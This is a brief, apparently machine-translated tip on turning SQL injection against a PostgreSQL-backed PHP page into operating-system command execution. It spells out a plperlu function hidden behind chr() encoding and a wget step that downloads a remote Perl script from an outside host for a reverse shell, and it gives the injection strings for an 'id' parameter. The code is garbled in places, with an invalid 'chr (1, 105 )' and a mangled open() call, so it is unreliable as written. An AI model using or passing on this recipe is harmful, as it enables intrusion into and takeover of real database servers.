Create function id () RETURNS text AS $ aaa $ open (FD, chr (108 ). chr (1, 105 ). chr (32 ). chr (124); return join (chr (0), <FD>); $ aaa $ LANGUAGE plperlu; select id (); id () is the name of the created function, you can customize chr (108 ). chr (105) is the asc code of the command id to be executed. You can replace the command to be executed with chr, specifically wget http://les.la/c.pl-O/tmp/c. pl deletes the function as drop function id (), and then executes the reverse shell command. This method can deal with all versions above 8.0 (including 8.0) the following is the actual injection format xxx. php? Id = 10; create function id () RETURNS text AS $ aaa $ open (FD, chr (108 ). chr (1, 105 ). chr (32 ). chr (124); return join (chr (0), <FD>); $ aaa $ LANGUAGE plperlu; -- xxx. php? Id = 10 and 1 = 2 union select null, id (), null --